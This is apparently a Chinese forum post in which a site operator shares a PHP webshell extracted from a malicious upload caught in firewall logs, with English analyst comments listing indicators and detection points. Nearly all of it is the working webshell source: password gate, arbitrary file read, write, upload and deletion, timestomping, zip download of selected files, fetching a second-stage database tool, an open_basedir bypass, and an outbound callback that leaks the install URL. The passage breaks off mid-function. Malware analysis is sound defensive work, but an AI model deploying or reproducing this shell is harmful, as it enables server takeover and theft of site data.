今天在清理防火墙日志的时候,发现了一个尝试上传假图片来干坏事的孙子,把 PHP 样本发出来一起研究研究。HTTP 包没有放完整,请求头后面原本跟了一大串 base64,我把里面的 PHP 提取出来单独放在下面了。
POST /index/my/do_my_info HTTP/1.1
content-type: application/x-www-form-urlencoded
connection: keep-alive
accept: */*
content-length: 46958
accept-encoding: gzip, deflate
user-agent: python-requests/2.28.1
下面是从这孙子传进来的 base64 中提取出来的恶意 PHP 程序样本,自行研究,产生的一切后果均与我无关,请自行找这孙子算账。请求来源是 38.47.180.20:[xxxxx](隐私保护,抹除了连接服务器时使用的端口)
<?php
// Analyst summary: bootstrap of a password-gated PHP file-manager webshell.
// All behaviour is driven by POST fields (act, cwd, p1..p3, dl[], password).
// This segment sets constants, performs an outbound lookup, enforces the
// cookie gate, picks the working directory and serves raw file downloads.

// Turns off PHP error reporting for the request.
error_reporting(0);
// AUTH is reused three ways below: the expected password, the name of the
// auth cookie, and (lower-cased, with '.app' appended) the host that is
// contacted for the IP lookup.
define('AUTH', 'BANDEX');
// Request-derived path and host; used in form actions, the Location header
// and the Referer that curl() sends on outbound requests.
define('SELF', $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
define('HOST', $_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']);
// True when the directory separator is a backslash (Windows host).
define('WIN', DIRECTORY_SEPARATOR == '\\');
// Hard-coded timezone; it affects every date()/strtotime() call in the file.
// NOTE(review): weak attribution hint at best - do not rely on it alone.
date_default_timezone_set('Asia/Jakarta');
session_cache_limiter('private');
// Removes the execution time limit for this request.
set_time_limit(0);
// The session is used later to hold a pending copy/move selection.
session_start();
// Output is buffered so the download branches can discard the HTML
// (ob_end_clean) before streaming a file.
ob_start();
// POST data is copied to $p0 and the superglobal is removed.
// NOTE(review): presumably to hide the parameters from code that inspects
// $_POST - intent cannot be confirmed from the sample.
$p0 = $_POST;
unset($_POST);
$act = isset($p0['act']) ? $p0['act'] : '';
// Creates $p1, $p2, $p3 from the POST fields of the same name via variable
// variables; each defaults to ''.
for ($p = 1; $p <= 3; $p++) {
${'p' . $p} = isset($p0['p' . $p]) ? $p0['p' . $p] : '';
}
// One year from now; used as the expiry of both cookies set below.
$time = (time() + 86400 * 365);
// Outbound lookup: when the visitor has no 'IP' cookie, the server fetches
// https://bandex[.]app (defanged; derived from AUTH on this page) and reads
// the 'ip' key of the JSON reply. This runs BEFORE the auth gate, so any
// request without that cookie triggers the outbound connection - a useful
// egress/DNS detection point. curl() also puts this script's URL in the
// Referer header of that request.
if (!isset($_COOKIE['IP'])) {
$net = json_decode(curl('https://' . strtolower(AUTH) . '.app'), TRUE);
if (!is_null($net)) {
$ip = $net['ip'];
}
// Falls back to the host's own resolved address when the lookup fails.
setcookie('IP', isset($ip) ? $ip : gethostbyname(gethostname()), $time);
}
// Login: the submitted password is upper-cased and compared (hex-encoded)
// with AUTH. On success a cookie named AUTH holding hex(AUTH) is set for a
// year and the client is redirected to the script itself.
if ($act === 'auth') {
$auth = strtoupper($p0['password']);
if (hex($auth) === hex(AUTH)) {
setcookie(AUTH, hex($auth), $time);
header('Location: ' . SELF);
exit();
}
}
// Gate: without a matching cookie, auth() prints the password form and exits.
// The expected cookie is a fixed string derived only from AUTH (for this
// sample: name BANDEX, value 42414e444558), so it is identical wherever the
// sample is installed and makes a stable log/WAF indicator.
if (!isset($_COOKIE[AUTH])) {
auth();
} else {
if ($_COOKIE[AUTH] !== hex(AUTH)) {
auth();
}
}
$msg = '';
// Default action is the file-manager view.
!$act && $act = 'file';
// Working directory comes straight from the POST field 'cwd'; no restriction
// is applied here. Without it, the script's own directory is used.
if (isset($p0['cwd']) && $p0['cwd']) {
chdir($p0['cwd']);
} else {
chdir(str_replace('\\', '/', dirname(__FILE__)) . '/');
}
$cwd = getcwd();
$pwd = $_SERVER['DOCUMENT_ROOT'];
// Normalises $cwd and $pwd in place (variable variables): forward slashes on
// Windows and a guaranteed trailing '/'.
foreach (['cwd', 'pwd'] as $a) {
if (WIN) {
$$a = str_replace('\\', '/', $$a);
}
if (substr($$a, -1) != '/') {
$$a = $$a . '/';
}
}
// Fallback definition, used only when the built-in scandir() does not exist.
// NOTE(review): presumably aimed at hosts that list scandir in
// disable_functions - confirm against the affected host's php.ini.
if (!function_exists('scandir')) {
function scandir($a){
$b = [];
while ($c = readdir(opendir($a))) {
$b[] = $c;
}
// Returns the collected names, or 0 when none were collected.
return $b ? $b : 0;
}
}
// Download action: streams the path in p1 as an attachment. The only checks
// are is_file() and is_readable(), so this reads any file the PHP process
// user can read, inside or outside the web root.
if ($act == 'download') {
if (is_file($p1) && is_readable($p1)) {
$a = pathinfo($p1);
if (function_exists('mime_content_type')) {
header('Content-Type: ' . mime_content_type($p1));
} else {
header('Content-type: application/x-' . $a['extension']);
}
header('Content-Disposition: attachment; filename=' . $a['basename']);
header('Content-Length: ' . sprintf("%u", filesize($p1)));
// Drops the buffered HTML so only the file bytes are sent.
ob_end_clean();
readfile($p1);
exit();
} else {
$msg = 'Can\'t read file';
$act = 'file';
}
}
?>
<html>
<head>
<meta name='robots' content='noindex, nofollow, noarchive;'>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8;'>
<title><?php echo HOST; ?></title>
<style type='text/css'>
body, td {font: 12px Arial, Tahoma; line-height: 16px;}
.input, select {font: 12px Arial, Tahoma; background: #fff; border: 1px solid #666; padding: 2px; height: 22px;}
.area {font: 12px 'Courier New', Monospace; background: #fff; border: 1px solid #666; padding: 2px;}
.red {color: #f00;}
.black {color: #000;}
.green {color: #090;}
.b {font-weight: bold;}
.bt {border-color: #b0b0b0; background: #3d3d3d; color: #fff; font: 12px Arial, Tahoma; height: 22px;}
a {color: #00f; text-decoration: none;}
a:hover {color: #f00; text-decoration: underline;}
.alt1 td {border-top: 1px solid #fff; border-bottom: 1px solid #ddd; background: #f1f1f1; padding: 5px 15px 5px 5px;}
.alt2 td {border-top: 1px solid #fff; border-bottom: 1px solid #ddd; background: #f9f9f9; padding: 5px 15px 5px 5px;}
.focus td {border-top: 1px solid #fff; border-bottom: 1px solid #ddd; background: #ffa; padding: 5px 15px 5px 5px;}
.head td {border-top: 1px solid #fff; border-bottom: 1px solid #ddd; background: #e9e9e9; padding: 5px 15px 5px 5px;}
form {margin: 0; padding: 0;}
h2 {margin: 0; padding: 0; height: 24px; line-height: 24px; font-size: 14px; color: #5B686F;}
u {text-decoration: none; color: #777; float: left; display: block; width: 150px; margin-right: 10px;}
.drives {padding: 5px;}
.drives span {margin: auto 3px;}
</style>
<script type='text/javascript'>
// Shorthand for document.getElementById(a).
function $(a){
return document.getElementById(a);
}
// Copies the state of the 'chkall' checkbox onto every other checkbox in
// form a (select-all for the file list).
function cbox(a){
for (var b = 0; b < a.elements.length; b++) {
var c = a.elements[b];
if (c.type == 'checkbox') {
if (c.name != 'chkall')
c.checked = a.chkall.checked;
}
}
}
// Prompts for a directory name and submits it as p1='create', p2=<name>.
function cdir(){
var a;
a = prompt('Input the directory name:', '');
if (!a) return;
exe(null, null, 'create', a);
}
// Prompts for a file name and opens the editor view: act='edit', p2=<name>.
function cfil(){
var a;
a = prompt('Input the file name:', '');
if (!a) return;
exe('edit', null, null, a);
}
// Writes the non-null arguments into the hidden 'opform' fields, in order:
// a -> act, b -> cwd, c -> p1, d -> p2, e -> p3. Null arguments leave the
// current field value untouched.
function form(a, b, c, d, e){
if (a != null) $('opform').act.value = a;
if (b != null) $('opform').cwd.value = b;
if (c != null) $('opform').p1.value = c;
if (d != null) $('opform').p2.value = d;
if (e != null) $('opform').p3.value = e;
}
// Prompts for new permissions for path a (b is the current value shown as
// the default) and submits p1='chmod', p2=<path>, p3=<permissions>.
function perm(a, b){
var c;
c = prompt("Current folder/file: " + a + "\nInput new permissions:", b);
if (!c) return;
exe(null, null, 'chmod', a, c);
}
// Prompts for a new name for a and submits p1='rename', p2=<new name>,
// p3=<old name>.
function edit(a){
var b;
b = prompt("Filename: " + a + "\nInput new filename:", "");
if (!b) return;
exe(null, null, 'rename', b, a);
}
// Single submit path for every UI action: fills 'opform' and posts it.
// The fifth argument is UTF-8 encoded and sent as lowercase hex in p3, so
// file contents, old names, permissions and timestamps never appear in
// cleartext in the request body; the PHP side reverses this with unhex().
// For detection: p3 values in captured requests are plain hex strings.
function exe(a, b, c, d, e){
form(a, b, c, d, Array.from(new TextEncoder().encode(e)).map(f => f.toString(16).padStart(2, '0')).join(''));
$('opform').submit();
}
</script>
</head>
<body style='margin: 0; table-layout: fixed; word-break: break-all;'>
<?php
// Emits the hidden form 'opform' that the page's JavaScript helper exe()
// fills in and submits. The current act/cwd/p1/p2/p3 values are echoed back
// into the value attributes as-is (fhide() does no escaping).
fhead(['name' => 'opform']);
fhide('act', $act);
fhide('cwd', $cwd);
fhide('p1', $p1);
fhide('p2', $p2);
fhide('p3', $p3);
mhtml('</form>');
?>
<table width='100%' border='0' cellpadding='0' cellspacing='0' style='text-align: center;'>
<tr class='head'>
<td><b><?php echo php_uname(); ?></b></td>
</tr>
</table>
<table width='100%' border='0' cellpadding='15' cellspacing='0'><tr><td>
<?php
// Analyst summary: the 'file' action. p1 selects a file-system operation that
// runs with the privileges of the PHP process; p2/p3 carry its arguments
// (p3 arrives hex-encoded) and dl[] carries the ticked list entries.
$msg && message($msg);
if ($act == 'file') {
$dw = is_writable($cwd) ? 'Writable' : 'Non-writable';
if (isset($p1)) {
switch ($p1) {
// Creates directory <cwd><p2> with mode 0755.
case 'create':
if ($p2) {
message('Directory created ' . (mkdir($cwd . $p2, 0755) ? 'success' : 'failed'));
}
break;
// Stores the uploaded file in cwd under the client-supplied file name; no
// extension, type or content check is made, so further scripts can be
// dropped anywhere the PHP user can write.
case 'upload':
message('File upload ' . (move_uploaded_file($_FILES['upload']['tmp_name'], $cwd . '/' . $_FILES['upload']['name']) ? 'success' : 'failed'));
break;
// p3 is hex-decoded and read as an octal mode for chmod() on p2.
case 'chmod':
if ($p2 && $p3) {
$p3 = base_convert(unhex($p3), 8, 10);
message('Set file permissions ' . (chmod($p2, $p3) ? 'success' : 'failed'));
}
break;
// Renames unhex(p3) (old name) to p2 (new name).
case 'rename':
if ($p2 && $p3) {
$p3 = unhex($p3);
message($p3 . ' renamed ' . $p2 . (rename($p3, $p2) ? ' success' : ' failed'));
}
break;
// Timestomping: sets both modification and access time of p2 to an
// operator-chosen timestamp. Forensic consequence: mtime/atime of anything
// reachable by this shell cannot be trusted for timeline work.
// NOTE(review): touch() has no parameter for the inode change time, so ctime
// may still be usable on POSIX filesystems - confirm on the affected host.
case 'settime':
if ($p2 && $p3) {
$time = strtotime(unhex($p3));
message('Set file last modified ' . (touch($p2, $time, $time) ? 'success' : 'failed'));
}
break;
// Deletes every entry in dl[]: directories through remove() (recursive),
// files through unlink(); $a counts successes, $b failures.
case 'delete':
if ($p0['dl']) {
$a = $b = 0;
foreach ($p0['dl'] as $c) {
if (is_dir($cwd . $c)) {
if (remove($cwd . $c)) {
$a++;
} else {
$b++;
}
} else {
if (unlink($cwd . $c)) {
$a++;
} else {
$b++;
}
}
}
message('Deleted folder/file(s) have finished, choose ' . count($p0['dl']) . ', success ' . $a . ', failed ' . $b);
} else {
message('Please select folder/file(s)');
}
break;
// Replays the copy/move selection stored in the session (see the default
// branch) into the current directory, then clears it.
case 'paste':
if ($_SESSION['exe'] == 'copy') {
foreach ($_SESSION['list'] as $a) {
duplicate($_SESSION['dir'], $a, $cwd);
}
} elseif ($_SESSION['exe'] == 'move') {
foreach ($_SESSION['list'] as $a) {
rename($_SESSION['dir'] . $a, $cwd . $a);
}
}
unset($_SESSION['exe'], $_SESSION['list'], $_SESSION['dir']);
message('Have been restored from the session');
break;
// Bulk collection: packs the selected entries into
// <system temp dir>/<HOST>_<YmdHis>.zip, streams the archive to the client
// and deletes it. The temp file exists only briefly, so disk artefacts are
// short-lived; large application/zip responses from a PHP endpoint are the
// more durable signal.
case 'zip':
if ($p0['dl']) {
$a = sys_get_temp_dir() . '/' . HOST . '_' . date('YmdHis') . '.zip';
$b = new ZipArchive();
if ($b->open($a, ZipArchive::CREATE)) {
foreach ($p0['dl'] as $c) {
if ($c == '.' || $c == '..') continue;
if (is_file($cwd . $c)) {
if (is_readable($cwd . $c)) {
$b->addFile($cwd . $c, $c);
}
} elseif (is_dir($cwd . $c)) {
// Directories are walked recursively; only readable files are added.
$d = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($c . '/', FilesystemIterator::SKIP_DOTS));
foreach ($d as $e => $f) {
if (is_readable(realpath($e))) {
$b->addFile(realpath($e), $e);
}
}
}
}
$b->close();
header('Content-Type: application/zip');
header('Content-Disposition: attachment; filename="' . basename($a) . '"');
header('Content-Length: ' . filesize($a));
ob_end_clean();
readfile($a);
unlink($a);
exit();
}
} else {
message('Please select folder/file(s)');
}
break;
// Extracts each selected archive into the current directory when it is
// writable.
case 'unzip':
if ($p0['dl']) {
if (is_writable($cwd)) {
$a = new ZipArchive();
foreach ($p0['dl'] as $b) {
if (is_readable($cwd . $b)) {
$a->open($cwd . $b);
$a->extractTo($cwd);
}
}
$a->close();
} else {
message('Directory is not writable');
gback();
}
} else {
message('Please select file(s) Zip');
}
break;
// copy/move only record the selection (operation, names, source directory)
// in the PHP session; the work happens on a later 'paste'.
default:
if ($p1 == 'copy' || $p1 == 'move') {
if (isset($p0['dl']) && count($p0['dl'])) {
$_SESSION['exe'] = $p1;
$_SESSION['list'] = $p0['dl'];
$_SESSION['dir'] = $p0['cwd'];
message('Have been saved to the session');
} else {
message('Please select folder/file(s)');
}
}
break;
}
// Clears p1/p2 in the hidden form so the operation is not repeated by the
// next submit.
echo "<script type=\"text/javascript\">$('opform').p1.value='';$('opform').p2.value='';</script>";
}
// Builds the clickable breadcrumb: one link per component of $cwd, each
// pointing at the cumulative path up to that component.
$cl = '';
$pl = explode('/', $cwd);
for ($a = 0; $a < count($pl) - 1; $a++) {
$cl .= '<a href="javascript:exe(\'file\', \'';
for ($b = 0; $b <= $a; $b++) {
$cl .= $pl[$b] . '/';
}
$cl .= '\');">' . $pl[$a] . '/</a>';
}
?>
<script type='text/javascript'>
document.onclick = shownav;
function shownav(a){
var b = a ? a.target : event.srcElement;
do {
if (b.id == 'jump') {
$('inputnav').style.display = '';
$('pathnav').style.display = 'none';
return;
}
if (b.id == 'inputnav') {
return;
}
b = b.parentNode;
} while (b.parentNode)
$('inputnav').style.display = 'none';
$('pathnav').style.display = '';
}
</script>
<div style='background: #eee; margin-bottom: 10px;'>
<form onsubmit="exe('file', this.cwd.value);return false;" method="post" id="godir" name="godir">
<table id='pathnav' width='100%' border='0' cellpadding='5' cellspacing='0'>
<tr>
<td width='100%'><?php echo $cl . ' - ' . gchmod($cwd) . ' / ' . mcolor($cwd) . guid($cwd); ?> (<?php echo $dw; ?>)</td>
<td nowrap><input class='bt' id='jump' name='jump' value='Jump to' type='button'></td>
</tr>
</table>
<table id='inputnav' width='100%' border='0' cellpadding='5' cellspacing='0' style='display:none;'>
<tr>
<td nowrap>Current Directory (<?php echo $dw; ?>, <?php echo gchmod($cwd); ?>)</td>
<td width='100%'><input class='input' name='cwd' value='<?php echo $cwd; ?>' type='text' style='width: 99%; margin: 0 8px;'></td>
<td nowrap><input class='bt' value='GO' type='submit'></td>
</tr>
</table>
</form>
<?php
// Windows hosts only: probes drive letters A: to Z: with is_dir() and prints
// a navigation link for each one that exists. $a holds the separator that is
// emitted before every link except the first.
if (WIN) {
$a = '';
mhtml('<div class="drives">');
foreach (range('A', 'Z') as $b) {
if (is_dir($b . ':/')) {
mhtml($a . '<a href="javascript:exe(\'file\', \'' . $b . ':/\');">' . strtoupper($b) . ':\</a>');
$a = '<span></span>';
}
}
mhtml('</div>');
}
?>
</div>
<?php
mhtml('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
mhtml('<tr class="alt1"><td colspan="6" style="padding: 5px; line-height: 20px;">');
mhtml('<form action="' . SELF . '" method="post" enctype="multipart/form-data"><div class="bt" style="float: right;"><input type="file" name="upload" onchange="this.form.submit()"/><input type="hidden" name="p1" value="upload"><input name="cwd" value="' . $cwd . '" type="hidden"/></div></form>');
mhtml('<a href="javascript:exe(\'file\', \'' . str_replace('\\', '/', $pwd) . '\');">WebRoot</a> | <a href="javascript:cdir();">CreateDirectory</a> | <a href="javascript:cfil();">CreateFile</a> | <a href="javascript:exe(\'sql\');">MySQL</a> | <a href="javascript:exe(\'bypass\');">OpenBaseDir</a>');
mhtml('</td></tr>');
$sort = ['filename', 1];
if ($p1) {
if (preg_match('!s_([A-z_]+)_(\d{1})!', $p1, $match)) {
$sort = [$match[1], (int)$match[2]];
}
}
fhead(['name' => 'flist']);
fhide('act', 'file');
fhide('p1', '');
fhide('cwd', $cwd);
mhtml('<tr class="head">');
mhtml('<td width="2%" nowrap><input name="chkall" value="on" type="checkbox" onclick="cbox(this.form)"/></td>');
mhtml('<td><a href="javascript:exe(\'file\',null,\'s_filename_' . ($sort[1] ? 0 : 1) . '\');">Filename</a> ' . ($p1 == 's_filename_0' ? '▼' : '') . ($p1 == 's_filename_1' || !$p1 ? '▲' : '') . '</td>');
mhtml('<td width="16%"><a href="javascript:exe(\'file\',null,\'s_mtime_' . ($sort[1] ? 0 : 1) . '\');">Last modified</a> ' . ($p1 == 's_mtime_0' ? '▼' : '') . ($p1 == 's_mtime_1' ? '▲' : '') . '</td>');
mhtml('<td width="10%"><a href="javascript:exe(\'file\',null,\'s_size_' . ($sort[1] ? 0 : 1) . '\');">Size</a> ' . ($p1 == 's_size_0' ? '▼' : '') . ($p1 == 's_size_1' ? '▲' : '') . '</td>');
mhtml('<td width="20%">Permissions</td>');
mhtml('<td width="22%">Action</td>');
mhtml('</tr>');
$dd = $fd = [];
$ds = scandir($cwd);
if ($ds) {
$ds = array_diff($ds, ['.']);
foreach ($ds as $fn) {
$fp = $cwd . $fn;
if (is_dir($fp)) {
$ddb['filename'] = $fn;
$ddb['mtime'] = date('Y-m-d H:i:s', filemtime($fp));
$ddb['chmod'] = gchmod($fp);
$ddb['perm'] = mcolor($fp);
$ddb['owner'] = guid($fp);
$ddb['link'] = $fp;
if ($fn == '..') {
$dd['up'] = 1;
} else {
$dd[] = $ddb;
}
} else {
$fdb['filename'] = $fn;
$fdb['size'] = sprintf("%u", filesize($fp));
$fdb['mtime'] = date('Y-m-d H:i:s', filemtime($fp));
$fdb['chmod'] = gchmod($fp);
$fdb['perm'] = mcolor($fp);
$fdb['owner'] = guid($fp);
$fdb['link'] = $fp;
$fd[] = $fdb;
}
}
unset($ddb);
unset($fdb);
}
$di = '0';
if (isset($dd['up'])) {
mhtml('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';"></tr>');
}
unset($dd['up']);
usort($dd, 'gsort');
usort($fd, 'gsort');
foreach ($dd as $dk => $ddb) {
if ($p1 == 'getsize' && $p2 == $ddb['filename']) {
$att = rsize($p2);
$att = is_numeric($att) ? ssize($att) : 'Unknown';
} else {
$att = '<a href="javascript:exe(\'file\', null, \'getsize\', \'' . $ddb['filename'] . '\');">View</a>';
}
mhtml('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
mhtml('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="' . $ddb['filename'] . '"></td>');
mhtml('<td><a href="javascript:exe(\'file\',\'' . $ddb['link'] . '\')">' . $ddb['filename'] . '</a></td>');
mhtml('<td nowrap><a href="javascript:exe(\'time\',null,\'' . $ddb['filename'] . '\');">' . $ddb['mtime'] . '</a></td>');
mhtml('<td nowrap>' . $att . '</td>');
mhtml('<td nowrap>');
mhtml('<a href="javascript:perm(\'' . $ddb['filename'] . '\', \'' . $ddb['chmod'] . '\');">' . $ddb['chmod'] . '</a> / ');
mhtml('<a href="javascript:perm(\'' . $ddb['filename'] . '\', \'' . $ddb['chmod'] . '\');">' . $ddb['perm'] . '</a>' . $ddb['owner'] . '</td>');
mhtml('<td nowrap><a href="javascript:edit(\'' . $ddb['filename'] . '\');">Rename</a></td>');
mhtml('</tr>');
$di++;
}
$fi = '0';
foreach ($fd as $fk => $fdb) {
$fu = '/' . str_replace($pwd, '', $fdb['link']);
mhtml('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
mhtml('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="' . $fdb['filename'] . '"></td>');
mhtml('<td>' . ((strpos($fdb['link'], $pwd) !== FALSE) ? '<a href="' . $fu . '" target="_blank">' . $fdb['filename'] . '</a>' : $fdb['filename']) . '</td>');
mhtml('<td nowrap><a href="javascript:exe(\'time\',null,\'' . $fdb['filename'] . '\');">' . $fdb['mtime'] . '</a></td>');
mhtml('<td nowrap>' . ssize($fdb['size']) . '</td>');
mhtml('<td nowrap>');
mhtml('<a href="javascript:perm(\'' . $fdb['filename'] . '\', \'' . $fdb['chmod'] . '\');">' . $fdb['chmod'] . '</a> / ');
mhtml('<a href="javascript:perm(\'' . $fdb['filename'] . '\', \'' . $fdb['chmod'] . '\');">' . $fdb['perm'] . '</a>' . $fdb['owner'] . '</td>');
mhtml('<td nowrap>');
mhtml('<a href="javascript:exe(\'download\',null,\'' . $fdb['filename'] . '\');">Download</a> | ');
mhtml('<a href="javascript:exe(\'edit\',null,null,\'' . $fdb['filename'] . '\');">Edit</a> | ');
mhtml('<a href="javascript:edit(\'' . $fdb['filename'] . '\');">Rename</a>');
mhtml('</td></tr>');
$fi++;
}
mhtml('<tr class="alt2 head"><td colspan="5"><a href="#" onclick="$(\'flist\').p1.value=\'zip\';$(\'flist\').submit();">ZipArchive</a> | <a href="#" onclick="$(\'flist\').p1.value=\'unzip\';$(\'flist\').submit();">ZipExtract</a> | <a href="#" onclick="$(\'flist\').p1.value=\'delete\';$(\'flist\').submit();">Delete</a> | <a href="#" onclick="$(\'flist\').p1.value=\'copy\';$(\'flist\').submit();">Copy</a> | <a href="#" onclick="$(\'flist\').p1.value=\'move\';$(\'flist\').submit();">Move</a>' . (isset($_SESSION['exe']) && count($_SESSION['list']) ? ' | <a href="#" onclick="$(\'flist\').p1.value=\'paste\';$(\'flist\').submit();">Paste</a>' : "") . '</td><td align="right">' . $di . " directories / " . $fi . " files</td></tr>");
mhtml('</form></table>');
} elseif ($act == 'edit') {
// Editor: when p1 is 'edit', the hex-decoded p3 is written to path p2.
// 'w+' creates or truncates the target, so this is an arbitrary file write
// limited only by the PHP user's permissions (e.g. modifying existing
// application files). The file is then read back and shown HTML-escaped.
if ($p1 == 'edit' && $p2 && $p3) {
$a = fopen($p2, 'w+');
message('Save file ' . (fwrite($a, unhex($p3)) ? 'success' : 'failed'));
fclose($a);
}
$b = '';
if (file_exists($p2)) {
$a = fopen($p2, 'r');
if (filesize($p2) !== 0) {
$b = fread($a, filesize($p2));
}
fclose($a);
$b = htmlspecialchars($b);
}
fhead(['title' => 'Create / Edit File', 'onsubmit' => 'exe(\'edit\',null,\'edit\',this.p2.value,this.p3.value);return false;']);
minput(['title' => 'Name', 'name' => 'p2', 'value' => $p2, 'newline' => 1]);
mtext(['title' => 'Content', 'name' => 'p3', 'value' => $b]);
ffoot();
gback();
} elseif ($act == 'time') {
// Form that feeds the 'settime' operation of the file view; it is pre-filled
// with the current modification time of p1.
fhead(['title' => 'Set last modified', 'onsubmit' => 'exe(\'file\',null,\'settime\',this.p2.value,this.p3.value);return false;']);
minput(['title' => 'Current folder/file', 'name' => 'p2', 'value' => $p1, 'newline' => 1]);
minput(['title' => 'Modify time', 'name' => 'p3', 'value' => date('Y-m-d H:i:s', filemtime($p1)), 'newline' => 1]);
ffoot();
gback();
} elseif ($act == 'sql') {
// Second-stage tooling: asks the GitHub API for the latest release of
// adminerevo/adminerevo, downloads the first release asset and saves it as
// 'sql.php' in the posted cwd. Both requests go through curl(), which has TLS
// verification switched off, and the payload is written without any integrity
// check. Indicators: an outbound request to api.github.com from the web
// server, and a new sql.php (a database administration tool) in cwd or in the
// document root.
$a = $act . '.php';
if (is_writable($p0['cwd'])) {
$b = $p0['cwd'] . $a;
$c = fopen($b, 'w+');
$d = curl('https://api.github.com/repos/adminerevo/adminerevo/releases/latest');
fwrite($c, curl(json_decode($d, TRUE)['assets'][0]['browser_download_url']));
fclose($c);
// When cwd is outside the document root, the root is chmod'ed to 0755 and the
// file is moved there so it becomes reachable over HTTP.
if (strpos($p0['cwd'], $pwd) === FALSE) {
$c = (chmod($pwd, 0755) ? TRUE : FALSE);
if (is_writable($pwd) && $c === TRUE) {
$b = $pwd . $a;
rename($p0['cwd'] . $a, $b);
}
}
// Sends the browser to the dropped file once it exists and is non-empty.
if (file_exists($b) && filesize($b) !== 0) {
echo '<script>window.location.replace(\'/' . str_replace($pwd, '', $b) . '\');</script>';
}
} else {
message('Directory is not writable');
gback();
}
} elseif ($act == 'bypass') {
// open_basedir loosening attempt: ensures <DOCUMENT_ROOT>public exists with
// mode 0755, writes a per-directory '.user.ini' containing 'open_basedir=/',
// copies this script to public/index.php and redirects there. Existing
// .user.ini / index.php files are left untouched (file_exists checks).
// NOTE(review): whether the override takes effect depends on the SAPI and on
// how open_basedir was configured - confirm on the affected host.
// Indicators: an unexpected .user.ini with that single line, and a
// public/index.php whose content matches this sample.
$a = $pwd . 'public';
if (!is_dir($a)) {
$b = (mkdir($a, 0755) ? TRUE : FALSE);
} else {
$b = (chmod($a, 0755) ? TRUE : FALSE);
}
if (is_writable($a) && $b === TRUE) {
$c = $a . '/.user.ini';
if (!file_exists($c)) {
$d = fopen($c, 'w+');
fwrite($d, 'open_basedir=/');
fclose($d);
}
$e = $a . '/index.php';
if (!file_exists($e)) {
copy($_SERVER['DOCUMENT_ROOT'] . SELF, $e);
}
echo '<script>window.location.replace(\'/public/index.php\');</script>';
} else {
message('Bypass base_dir failed');
gback();
}
} else {
// Any other act value ends here.
message('Undefined Action');
gback();
}
?>
</td></tr></table>
<div style='padding: 5px; border-bottom: 1px solid #fff; border-top: 1px solid #ddd; background: #eee; text-align: center; font-weight: bold;'>
<tr class='alt1'>
<td>《 <?php echo $_COOKIE['IP']; ?> 》</td>
</tr>
</div>
</body>
</html>
<?php
/**
 * Prints the login form and terminates the request.
 *
 * The form posts a hidden act=auth plus a single field named 'password' to
 * the script itself. The injected style makes the input borderless and
 * transparent, so the page shows no visible login prompt.
 */
function auth(){
fhead();
fhide('act', 'auth');
mhtml('<style>input {margin: 0; background-color: inherit; border: 1px solid transparent; text-align: center;}</style><center>');
minput(['name' => 'password', 'type' => 'password', 'size' => '10']);
mhtml('</form></center>');
exit();
}
/**
 * HTTP client helper used for the IP lookup and the 'sql' download.
 *
 * Analyst notes:
 * - TLS host and peer verification are both disabled.
 * - Redirects are followed.
 * - The User-Agent is 'curl/<libcurl version>', so the traffic looks like the
 *   command-line tool.
 * - The Referer is set to <scheme>://<HOST><SELF>, i.e. the URL of this
 *   script on the compromised site. Every endpoint contacted through this
 *   helper therefore learns where the sample is installed.
 *   NOTE(review): presumably this is how installations are reported back;
 *   intent cannot be confirmed from the sample.
 *
 * @param string $a URL to request.
 * @param mixed  $b POST fields; when not '' the request is sent as POST.
 * @return string|false Response body as returned by curl_exec().
 */
function curl($a, $b = ''){
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $a);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($c, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
if ($b != '') {
curl_setopt($c, CURLOPT_POSTFIELDS, $b);
curl_setopt($c, CURLOPT_POST, TRUE);
}
curl_setopt($c, CURLOPT_USERAGENT, 'curl/' . curl_version()['version']);
// Works out whether the current request arrived over HTTPS, to build the
// Referer with the matching scheme.
if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
(!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') ||
(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on')) {
$d = 'https';
} else {
$d = 'http';
}
curl_setopt($c, CURLOPT_REFERER, $d . '://' . HOST . SELF);
$e = curl_exec($c);
curl_close($c);
return $e;
}
/**
 * Recursively copies entry $b from directory $a into directory $c.
 *
 * Directories are recreated with mkdir() and walked with scandir(); regular
 * files are copied with copy(). Anything else is skipped.
 *
 * @param string $a Source directory (the callers pass it with a trailing '/').
 * @param string $b Entry name inside the source directory.
 * @param string $c Destination directory (with a trailing '/').
 */
function duplicate($a, $b, $c){
if (is_dir($a . $b)) {
mkdir($c . $b);
$d = scandir($a . $b);
if ($d) {
$d = array_diff($d, ['..', '.']);
foreach ($d as $e) {
duplicate($a . $b . '/', $e, $c . $b . '/');
}
}
} elseif (is_file($a . $b)) {
copy($a . $b, $c . $b);
}
}
/**
 * Prints a submit button followed by the closing form tag.
 *
 * @param string $a Name and id of the button; defaults to 'submit' when empty.
 */
function ffoot($a = ''){
!$a && $a = 'submit';
mhtml('<p><input class="bt" name="' . $a . '" id="' . $a . '" type="submit" value="Submit"></p>');
mhtml('</form>');
}
/**
 * Prints an opening form tag that targets the script itself (SELF).
 *
 * Recognised keys of $a: 'method' (default 'post'), 'name' (default 'form1',
 * also used as the id), 'onsubmit' (optional handler) and 'title' (optional
 * heading printed after the tag). Values are interpolated without escaping.
 *
 * @param array $a Form options.
 */
function fhead($a = []){
!isset($a['method']) && $a['method'] = 'post';
!isset($a['name']) && $a['name'] = 'form1';
$a['onsubmit'] = isset($a['onsubmit']) ? "onsubmit=\"$a[onsubmit]\"" : '';
